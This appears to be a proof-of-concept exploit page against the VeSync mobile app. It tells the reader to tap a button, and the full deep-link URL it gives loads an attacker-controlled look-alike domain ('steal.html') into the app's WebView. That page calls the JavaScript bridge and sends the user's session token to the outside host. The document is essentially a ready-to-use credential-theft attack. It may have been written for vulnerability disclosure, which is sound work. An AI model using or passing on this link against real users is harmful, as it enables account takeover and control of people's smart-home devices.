VeSync Deep Link Token Theft PoC

Tap the button below on a device with VeSync app installed.
The deep link opens the in-app WebView, calls the JS bridge, and exfiltrates the session token.

Open VeSync Deep Link
vesync://link/h5?webUrl=https://vesync.com.purple8080.com/steal.html